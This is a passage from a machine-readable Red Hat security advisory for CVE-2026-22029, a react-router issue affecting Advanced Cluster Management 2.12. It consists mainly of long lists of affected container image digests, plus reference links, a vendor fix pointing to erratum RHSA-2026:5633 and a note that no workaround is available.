"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-22029"
},
{
"category": "external",
"summary": "RHBZ#2428412",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2428412"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-22029",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22029"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-22029",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22029"
},
{
"category": "external",
"summary": "https://github.com/remix-run/react-router/security/advisories/GHSA-2w69-qvjg-hvjx",
"url": "https://github.com/remix-run/react-router/security/advisories/GHSA-2w69-qvjg-hvjx"
}
],
"release_date": "2026-01-10T02:42:32.736000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T14:07:27+00:00",
"details": "Before you apply this update, make sure all previously released errata\nthat are relevant to your system are applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5633"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
